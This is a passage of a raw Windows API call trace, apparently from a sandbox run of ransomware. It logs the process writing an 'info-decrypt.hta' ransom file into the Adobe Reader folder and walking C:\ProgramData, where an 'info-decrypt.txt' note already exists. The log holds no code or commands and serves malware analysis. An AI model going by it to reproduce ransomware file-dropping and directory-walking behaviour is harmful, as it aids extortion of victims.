(x86)\\Adobe\\Reader 10.0\\Reader\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6e898, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\info-decrypt.hta", lpFilePart=0x0) returned 0x40 [0215.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ed8c) returned 1 [0215.559] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0215.559] GetFileType (hFile=0x31c) returned 0x1 [0215.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ed88) returned 1 [0215.560] GetFileType (hFile=0x31c) returned 0x1 [0215.560] WriteFile (in: hFile=0x31c, lpBuffer=0x370a0f4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x8f6ee50, lpOverlapped=0x0 | out: lpBuffer=0x370a0f4*, lpNumberOfBytesWritten=0x8f6ee50*=0x1000, lpOverlapped=0x0) returned 1 [0215.561] WriteFile (in: hFile=0x31c, lpBuffer=0x370a0f4*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x8f6ee24, lpOverlapped=0x0 | out: lpBuffer=0x370a0f4*, lpNumberOfBytesWritten=0x8f6ee24*=0x55e, lpOverlapped=0x0) returned 1 [0215.561] CloseHandle (hObject=0x31c) returned 1 [0215.562] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\A3DUtils.dll", nBufferLength=0x105, lpBuffer=0x8f6e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\A3DUtils.dll", lpFilePart=0x0) returned 0x3c [0215.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea4) returned 1 [0215.562] GetFileAttributesExW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\A3DUtils.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\a3dutils.dll"), fInfoLevelId=0x0, lpFileInformation=0x370b110) Thread: id = 117 os_tid = 0x604 [0132.184] SysReAllocStringLen (in: pbstr=0x691fb1c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x691fb1c*="KERNEL32.DLL") returned 1 [0132.184] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.185] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.187] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0132.188] SysReAllocStringLen (in: pbstr=0x691fb1c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x691fb1c*="KERNEL32.DLL") returned 1 [0132.188] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.188] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.190] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0132.191] SysReAllocStringLen (in: pbstr=0x691faf8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x691faf8*="KERNEL32.DLL") returned 1 [0132.191] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.191] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.193] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0132.195] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0132.197] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0132.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f4cc) returned 1 [0132.197] GetFullPathNameW (in: lpFileName="C:\\ProgramData", nBufferLength=0x105, lpBuffer=0x691efd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData", lpFilePart=0x0) returned 0xe [0132.197] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x105, lpBuffer=0x691efa8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x0) returned 0xf [0132.197] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*", lpFindFileData=0x691f1f4 | out: lpFindFileData=0x691f1f4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.197] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.198] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0132.198] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0132.198] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0132.198] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0132.198] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0132.198] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfcd23a40, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd49ba0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0132.199] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0132.199] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0132.199] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0132.199] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0132.199] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0132.199] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0132.199] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0132.200] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0132.200] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0132.200] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f48c) returned 1 [0132.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f498) returned 1 [0132.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f4cc) returned 1 [0132.200] GetFullPathNameW (in: lpFileName="C:\\ProgramData", nBufferLength=0x105, lpBuffer=0x691efd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData", lpFilePart=0x0) returned 0xe [0132.200] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x105, lpBuffer=0x691efa8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x0) returned 0xf [0132.200] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*", lpFindFileData=0x691f1f4 | out: lpFindFileData=0x691f1f4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.200] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.201] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0132.201] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0132.201] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0132.201] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0132.201] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0132.201] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfcd23a40, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd49ba0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0132.201] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0132.202] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0132.202] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0132.202] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0132.202] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0132.202] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0132.202] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0132.202] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0132.202] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f204 | out: lpFindFileData=0x691f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0132.203] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f48c) returned 1 [0132.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f498) returned 1 [0132.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f47c) returned 1 [0132.203] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe", nBufferLength=0x105, lpBuffer=0x691ef84, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe", lpFilePart=0x0) returned 0x14 [0132.203] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\", nBufferLength=0x105, lpBuffer=0x691ef58, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\", lpFilePart=0x0) returned 0x15 [0132.203] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\*", lpFindFileData=0x691f1a4 | out: lpFindFileData=0x691f1a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.203] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.203] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0132.203] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f1b4 | out: lpFindFileData=0x691f1b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, 